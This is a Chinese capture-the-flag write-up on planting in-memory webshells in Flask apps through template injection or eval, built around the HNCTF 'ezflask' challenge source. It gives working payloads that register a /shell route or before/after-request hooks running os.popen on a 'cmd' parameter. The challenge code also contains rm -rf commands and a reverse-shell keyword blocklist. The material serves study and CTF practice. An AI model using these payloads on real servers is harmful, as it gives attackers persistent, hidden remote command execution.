python内存马分析

前言

最近那场HNCTF有一道只能执行一次的Flask模板注入,这个预期解是用python内存马,这篇就来学习一下,做一下笔记。

原理

Python常见的框架有DjangoFlask,这两个都可能存在SSTI注入,Python 内存马就是利用FlaskSSTI注入来实现。

flask route

flask常规注册的方式为使用装饰器@app.route(),而实际工作的函数为装饰器里调用的self.add_url_rule()

self.app_url_rule(rule,endpoint=None,view_func=None)

  • rule: 就是url,和装饰器app.route() 的第一个参数一样,必须以/ 开始
  • endpoint: 就是在使用url_for()进行反转的时候,这个里面传入的第一个参数就是这个endpoint对应的值。这个值也可以不指定,默认值为函数名。
  • view_func: 只需要写方法名(也可以为匿名参数),如果使用方法名不要加括号,加括号表示将函数的返回值传给了view_func参数了,程序就会直接报错。

这个可以用来添加路由

flask context

想实现webshell关键在于view_funcview_func可以采用匿名函数定义逻辑,该方法要实现捕获参数值、执行命令、响应。

来说一下这个flask的工作原理:当一个请求进入Flask,首先会实例化一个Request Context,这个上下文封装了请求的信息在Request中,并将这个上下文推入到一个栈_request_ctx_stack的结构中,也就是说获取当前的请求上下文等同于获取_request_ctx_stack的栈顶元素_request_ctx_stack.top

flask 内置函数

对于ssti不熟悉的师傅可以看看我的另一篇文章—>https://ctf.d3ic1de.club/posts/da44154f.html

通过{{}}我们可以执行表达式,但是命名空间是受限的,没有builtins,所以eval、popen这些操作时不能使用的。但我们可以通过任意一个函数的func_globals而得到他们的命名空间而得到builtins

Flask内置了两个函数url_forget_flashed_messages也就是说想构造命令执行的话,就可以用:

1
{{url_for.__globals__['__builtins__'].__import__('os').system('ls')}}{{url_for.__globals__['__builtins__']['eval']("__import__('os').popen('whoami').read()")}}

那么内存马也就可以构造出来了

1
url_for.__globals__['__builtins__']['eval'](  "app.add_url_rule('/shell', 'shell', lambda:__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})

这里注册了一个/shell的路由,路由对应的逻辑为执行cmd参数值命令

漏洞环境

这里我就直接用HNCTF的这道ezflask,官方WP这给了题目源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
from flask import Flask, request, abort, render_template_string , config
from jinja2 import Template
import os
import shutil
import re

app = Flask(__name__)
# 路由可用性标志
routes_enabled = {
'Adventure': True
}

eval('__import__("os").popen("sh /start.sh").read()')
eval('__import__("os").popen("chmod -R 000 /app/static/").read()')
eval('__import__("os").popen("rm -rf /bin/mkdir").read()')
eval('__import__("os").popen("rm -rf /bin/touch").read()')
eval('__import__("os").popen("rm -rf /bin/cp").read()')
eval('__import__("os").popen("rm -rf /bin/mv").read()')
eval('__import__("os").popen("rm -rf /usr/bin/curl").read()')
eval('__import__("os").popen("rm -rf /usr/bin/ping").read()')
eval('__import__("os").popen("rm -rf /usr/bin/wget").read()')

if 'GZCTF_FLAG' in os.environ:
del os.environ['GZCTF_FLAG']

@app.route('/')
def index():
return ('冒险即将开始!!!\n'
'请移步/Adventure路由进行命令执行,后端语句为:\n'
' cmd = request.form[\'cmd\']\n'
' eval(cmd)\n'
'注意,你仅有一次机会,在进行唯一一次成功的命令执行后生成flag并写入/flag\n'
'执行无回显,目录没权限部分命令ban,也不要想着写文件~\n')

@app.route('/Adventure', methods=['POST'])
def rce():
if routes_enabled.get('Adventure', False):
# 获取POST请求中的cmd参数
cmd = request.form['cmd']

try:
bash_pattern = r'(bash|[-]c|[-]i|[-]d|dev|tcp|http|https|base|echo|YmFzaCA|bas|ash|ba\"\"sh|ba\'\'sh|ba\'sh|ba\"sh)'

# 检查是否反弹shell
if bool(re.search(bash_pattern, cmd)):
return "亲亲这边不支持反弹shell哦~", 200

eval(cmd)

eval('__import__("os").popen("rm -rf /app/static/").read()')

# 编码后正则
pattern = [
r'@app\.route',
r'ZnJvbSBmbGFzay',
r'%40app.route',
r'\x40\x61\x70\x70\x2e\x72\x6f\x75\x74\x65',
r'@ncc\.ebhgr',
r'etuor\.ppa@',
r'\u0040\u0061\u0070\u0070\u002e\u0072\u006f\u0075\u0074\u0065',
r'from flask import Flask',
r'from%20flask%20import%20Flask',
r'\x66\x72\x6f\x6d\x20\x66\x6c\x61\x73\x6b\x20\x69\x6d\x70\x6f\x72\x74\x20\x46\x6c\x61\x73\x6b',
r'\u0066\u0072\u006f\u006d\u0020\u0066\u006c\u0061\u0073\u006b\u0020\u0069\u006d\u0070\u006f\u0072\u0074\u0020\u0046\u006c\u0061\u0073\u006b',
r'sebz synfx vzcbeg Synfx',
r'from flask import Flask',
r'ksalF tropmi ksalf morf',
r'flag',
r'galf',
]

pattern = '|'.join(pattern) # 将列表合并为一个正则表达式字符串

# 检查是否匹配
if bool(re.search(pattern, eval(cmd))):
return "不要想着读取源码哦~", 200

# 关闭路由
routes_enabled['Adventure'] = not routes_enabled['Adventure']
with open('/etc/jaygalf', 'r') as source_file:
content = source_file.read()
with open('/flag', 'w') as target_file:
target_file.write(content)

eval('__import__("os").popen("rm -rf /app/static/").read()')

return f"Success! 但是不回显嘻嘻", 200
except Exception as e:
if re.search(r"View function mapping is overwriting an existing endpoint function: (\w+)", str(e)):
routes_enabled['Adventure'] = not routes_enabled['Adventure']
with open('/etc/jaygalf', 'r') as source_file:
content = source_file.read()
with open('/flag', 'w') as target_file:
target_file.write(content)
return f"恭喜师傅,是预期解!!!!", 200

return f"Error executing command: {e}", 400

else:
abort(403) # 如果路由被禁用,则返回403禁止访问


if __name__ == '__main__':
app.run(debug=False,host='0.0.0.0', port=9035)

payload

创建/shell路由,将/flag的内容读取出来显示,直接访问就能获得flag

1
cmd=app.add_url_rule('/shell','shell',lambda:__import__('os').popen('cat /flag').read())

访问/shellget方法传入参数cmd执行任意命令/shell?cmd=cat /flag

1
cmd=render_template_string("{{url_for.__globals__['__builtins__']['eval'](\"app.add_url_rule('/shell', 'myshell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd')).read())\",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})}}")

官方给的另两个payload

同时get传参cmd执行任意命令/Adventure?cmd=cat /flag

1
cmd=str(app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec('global CmdResp;CmdResp=__import__(\'flask\').make_response(os.popen(request.args.get(\'cmd\')).read())')==None else resp))

app.after_request_funcs.setdefault(None, []): 这是在Flask应用中设置一个默认的后处理函数列表,如果after_request_funcs字典中还没有None这个键,就设置一个空列表。然后把后面的这个resp函数添加到列表里。这个函数先检查是否存在名为cmd的查询参数,存在的话就再从请求的查询参数中获取cmd的值,然后用os.popen执行命令并获取输出。然后使用exec执行这段获取的命令的输出,将其作为python代码执行,如果exec执行后返回None,说明命令执行成功且没有返回数据,那么返回CmdResp否则返回原始的resp

主要就是在Flask应用接收到包含cmd参数的请求时,尝试执行该参数指定的命令,并在命令执行成功且没有输出时替换响应。如果没有cmd参数或者命令执行失败,将返回原始的响应。

同时get传参cmd执行任意命令/Adventure?cmd=cat /flag

1
cmd=app.before_request_funcs.setdefault(None, []).append(lambda :__import__('os').popen(request.args.get('cmd')).read())

这个跟上面这个差不多,主要也是用这个lambda :__import__('os').popen(request.args.get('cmd')).read()这个就没上面这么复杂,直接执行它导入os模块,然后使用os.popen执行命令,获取命令的输出。

这个会在每个请求(包括GET和POST等)开始前执行cmd参数指定的命令。